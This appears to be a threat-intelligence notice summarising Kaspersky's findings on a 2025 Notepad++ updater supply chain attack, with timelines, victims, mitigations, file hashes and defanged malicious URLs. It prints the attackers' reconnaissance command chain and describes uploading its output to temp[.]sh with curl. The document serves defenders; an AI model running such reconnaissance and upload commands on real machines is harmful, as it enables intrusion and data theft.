overview

Kaspersky researchers uncovered multiple undocumented infection chains in a supply chain attack targeting Notepad++ users from July to October 2025, where attackers compromised the software's update mechanism to deliver Cobalt Strike Beacons and other malware to a limited set of victims, including organizations in Southeast Asia and financial entities.

 

incident overview and timeline

The attack spanned four months, with attackers rotating command-and-control (C2) servers, downloaders, and payloads to evade detection. Initial activity began in July2025, paused briefly, resumed in early August, continued into mid-September, and evolved again in early October. Kaspersky telemetry detected these chains affecting about a dozen machines, with all attempts blocked by their solutions.

 

infection chains and technical breakdown

Attackers distributed malicious update.exe files via compromised Notepad++ updater URLs, such as http://45.76.155[.]202/update/update.exe and http://45.32.144[.]255/update/update.exe.

These were NSIS installers that performed reconnaissance—executing commands like cmd /c"whoami&&tasklist&&systeminfo&&netstat -ano"> a.txt—and uploaded results to temp[.]sh via curl, then dropped next-stage payloads like alien.dll to %APPDATA%\Adobe\Scripts.

  • Chain#1 (July-August 2025): Downloaders collected system info and delivered Cobalt Strike Beacon payloads (e.g., SHA1: 90e677d7ff5844407b9c073e3b7e896e078e11cd).

  • Chain#2 (Mid-September 2025): Enhanced reconnaissance with expanded shell commands; dropped alien.dll (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da) and other files.

  • Chain#3 (Early October 2025): Simplified dropper (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) without initial recon, focusing on payload deployment.

Payloads used DLL sideloading and shellcode padding to obscure execution, targeting Windows systems via the WinGUp updater.

 

affected entities

Infections hit individuals in Vietnam, El Salvador, and Australia, plus organizations: a Philippine government entity, an El Salvador financial organization, and a Vietnam IT service provider. Attacks showed targeting toward South Asian political and economic interests.

 

mitigation strategies

Notepad++ released version 8.8.9 with signature verification for updates. Recommendations include verifying update signatures, monitoring network traffic for anomalies, behavioral analysis of updaters, and blocking known IoCs like malicious domains and file hashes. Enterprises should enforce update controls and avoid unverified open-source tools.

 

background information

Supply chain attacks exploit trusted software updaters, as seen here with Notepad++'s WinGUp, where DNS manipulation or network compromise redirected users to malicious URLs. Open-source projects like Notepad++ are vulnerable due to limited resources for securing update pipelines, evading traditional antivirus via low-entropy files and legitimate signing mimicry. This fits a trend of targeted operations over mass campaigns, often linked to state actors.

 

tables and data

Observed Malicious File Hashes

Stage/Chain

File

SHA1 Hash

Notes

Chain #1/2

update.exe

90e677d7ff5844407b9c073e3b7e896e078e11cd

Cobalt Strike delivery

Chain #2

update.exe

573549869e84544e3ef253bdba79851dcde4963a

NSIS installer with recon

Chain #2

alien.dll

6444dab57d93ce987c22da66b3706d5d7fc226da

Dropped payload

Chain #2

update.exe

13179c8f19fbf3d8473c49983a199e6cb4f318f0

Cobalt Strike variant

Chain #3

update.exe

d7ffd7b588880cf61b603346a3557e7cce648c93

Simplified NSIS dropper


Key Malicious URLs and Recon Commands

Component

Details

Purpose

C2 URLs

http://45.76.155[.]202/update/update.exe
http://45.32.144[.]255/update/update.exe

Malicious update distribution

Recon Endpoint

temp[.]sh (via curl)

System info upload

Shell Commands

whoami && tasklist && systeminfo && netstat -ano

Gather host details

 

 

SUPPORTING DOCUMENTATION






 
supply chain security Malware Flash Notice Supply Chain Attack Blog